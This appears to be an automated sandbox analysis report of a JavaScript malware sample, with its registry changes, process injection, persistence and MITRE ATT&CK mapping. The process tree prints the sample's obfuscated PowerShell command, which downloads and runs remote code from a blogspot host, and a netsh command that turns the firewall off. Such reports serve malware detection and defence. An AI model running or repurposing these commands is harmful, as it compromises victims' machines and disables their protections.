769006583bec47caecc33764e3752253ed765e6f49270621d5904e28fb0d51d2

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
11	2884	powershell.exe
20	2884	powershell.exe
38	2884	powershell.exe
50	2884	powershell.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
3040	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	wscript.exe

Registers COM server for autorun 1 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\INtuiteupdate = "schtasks /run /tn INtuiteupdate"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
134	api.ipify.org
135	api.ipify.org

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2884 set thread context of 436	2884	powershell.exe	118
PID 2884 set thread context of 3052	2884	powershell.exe	119
PID 2884 set thread context of 3268	2884	powershell.exe	123

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	dw20.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	powershell.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
2884	powershell.exe
2884	powershell.exe
2884	powershell.exe
2884	powershell.exe
2884	powershell.exe
2884	powershell.exe
2884	powershell.exe
2884	powershell.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
436	RegSvcs.exe
436	RegSvcs.exe
436	RegSvcs.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	436	RegSvcs.exe
Token: SeRestorePrivilege	4472	dw20.exe
Token: SeBackupPrivilege	4472	dw20.exe
Token: SeBackupPrivilege	4472	dw20.exe
Token: SeBackupPrivilege	4472	dw20.exe
Token: SeBackupPrivilege	4472	dw20.exe
Token: SeBackupPrivilege	3240	dw20.exe
Token: SeBackupPrivilege	3240	dw20.exe
Token: SeIncreaseQuotaPrivilege	2884	powershell.exe
Token: SeSecurityPrivilege	2884	powershell.exe
Token: SeTakeOwnershipPrivilege	2884	powershell.exe
Token: SeLoadDriverPrivilege	2884	powershell.exe
Token: SeSystemProfilePrivilege	2884	powershell.exe
Token: SeSystemtimePrivilege	2884	powershell.exe
Token: SeProfSingleProcessPrivilege	2884	powershell.exe
Token: SeIncBasePriorityPrivilege	2884	powershell.exe
Token: SeCreatePagefilePrivilege	2884	powershell.exe
Token: SeBackupPrivilege	2884	powershell.exe
Token: SeRestorePrivilege	2884	powershell.exe
Token: SeShutdownPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeSystemEnvironmentPrivilege	2884	powershell.exe
Token: SeRemoteShutdownPrivilege	2884	powershell.exe
Token: SeUndockPrivilege	2884	powershell.exe
Token: SeManageVolumePrivilege	2884	powershell.exe
Token: 33	2884	powershell.exe
Token: 34	2884	powershell.exe
Token: 35	2884	powershell.exe
Token: 36	2884	powershell.exe
Token: SeIncreaseQuotaPrivilege	2884	powershell.exe
Token: SeSecurityPrivilege	2884	powershell.exe
Token: SeTakeOwnershipPrivilege	2884	powershell.exe
Token: SeLoadDriverPrivilege	2884	powershell.exe
Token: SeSystemProfilePrivilege	2884	powershell.exe
Token: SeSystemtimePrivilege	2884	powershell.exe
Token: SeProfSingleProcessPrivilege	2884	powershell.exe
Token: SeIncBasePriorityPrivilege	2884	powershell.exe
Token: SeCreatePagefilePrivilege	2884	powershell.exe
Token: SeBackupPrivilege	2884	powershell.exe
Token: SeRestorePrivilege	2884	powershell.exe
Token: SeShutdownPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeSystemEnvironmentPrivilege	2884	powershell.exe
Token: SeRemoteShutdownPrivilege	2884	powershell.exe
Token: SeUndockPrivilege	2884	powershell.exe
Token: SeManageVolumePrivilege	2884	powershell.exe
Token: 33	2884	powershell.exe
Token: 34	2884	powershell.exe
Token: 35	2884	powershell.exe
Token: 36	2884	powershell.exe
Token: SeIncreaseQuotaPrivilege	2884	powershell.exe
Token: SeSecurityPrivilege	2884	powershell.exe
Token: SeTakeOwnershipPrivilege	2884	powershell.exe
Token: SeLoadDriverPrivilege	2884	powershell.exe
Token: SeSystemProfilePrivilege	2884	powershell.exe
Token: SeSystemtimePrivilege	2884	powershell.exe
Token: SeProfSingleProcessPrivilege	2884	powershell.exe
Token: SeIncBasePriorityPrivilege	2884	powershell.exe
Token: SeCreatePagefilePrivilege	2884	powershell.exe
Token: SeBackupPrivilege	2884	powershell.exe
Token: SeRestorePrivilege	2884	powershell.exe
Token: SeShutdownPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1172	AcroRd32.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe
1172	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4300 wrote to memory of 2884	4300	wscript.exe	91
PID 4300 wrote to memory of 2884	4300	wscript.exe	91
PID 2884 wrote to memory of 1172	2884	powershell.exe	103
PID 2884 wrote to memory of 1172	2884	powershell.exe	103
PID 2884 wrote to memory of 1172	2884	powershell.exe	103
PID 2884 wrote to memory of 2380	2884	powershell.exe	104
PID 2884 wrote to memory of 2380	2884	powershell.exe	104
PID 2380 wrote to memory of 4328	2380	csc.exe	106
PID 2380 wrote to memory of 4328	2380	csc.exe	106
PID 2884 wrote to memory of 3040	2884	powershell.exe	105
PID 2884 wrote to memory of 3040	2884	powershell.exe	105
PID 1172 wrote to memory of 1880	1172	AcroRd32.exe	107
PID 1172 wrote to memory of 1880	1172	AcroRd32.exe	107
PID 1172 wrote to memory of 1880	1172	AcroRd32.exe	107
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 5004	1880	RdrCEF.exe	108
PID 1880 wrote to memory of 3008	1880	RdrCEF.exe	109
PID 1880 wrote to memory of 3008	1880	RdrCEF.exe	109
PID 1880 wrote to memory of 3008	1880	RdrCEF.exe	109
PID 1880 wrote to memory of 3008	1880	RdrCEF.exe	109
PID 1880 wrote to memory of 3008	1880	RdrCEF.exe	109
PID 1880 wrote to memory of 3008	1880	RdrCEF.exe	109
PID 1880 wrote to memory of 3008	1880	RdrCEF.exe	109
PID 1880 wrote to memory of 3008	1880	RdrCEF.exe	109
PID 1880 wrote to memory of 3008	1880	RdrCEF.exe	109

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\2036c55eeff25d6200dcbf7d4b91bf4137c9829e6435a451ded924c828ec662e.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm cplcpus.blogspot.com///////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 5
  2⤵
  - UAC bypass
  - Blocklisted process makes network request
  - Registers COM server for autorun
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2884
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\2023 1040 (Cornelius Morgan G).pdf"
    3⤵
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1172
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1880
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=155D6B57ECFCB5F3E518C7E6B041077C --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:5004
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A6991A39B5A2CCC81081F473BEA0B4BD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A6991A39B5A2CCC81081F473BEA0B4BD --renderer-client-id=2 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:3008
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A07450781E2D7C0DB84C9A2D9C12B258 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:968
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=1C52815015BFDA280641F91CB1F6E227 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=1C52815015BFDA280641F91CB1F6E227 --renderer-client-id=5 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:4716
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A129DAAA691A277A7B3DC4B5264D6D5E --mojo-platform-channel-handle=2864 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:3268
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 284
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:3240
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AE3B66DD4209BB74F8906280F5BDEB76 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:1960
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\di2t4pem\di2t4pem.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2380
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9049.tmp" "c:\Users\Admin\AppData\Local\Temp\di2t4pem\CSCA91244868DF34DC5866DBDD9FBF79E3F.TMP"
      4⤵
      PID:4328
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
    3⤵
    - Modifies Windows Firewall
    PID:3040
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:436
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:3052
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 784
      4⤵
      Drops file in Windows directory
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious use of AdjustPrivilegeToken
      PID:4472
- - C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
    3⤵
    PID:3268

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Discovery

Query Registry

System Information Discovery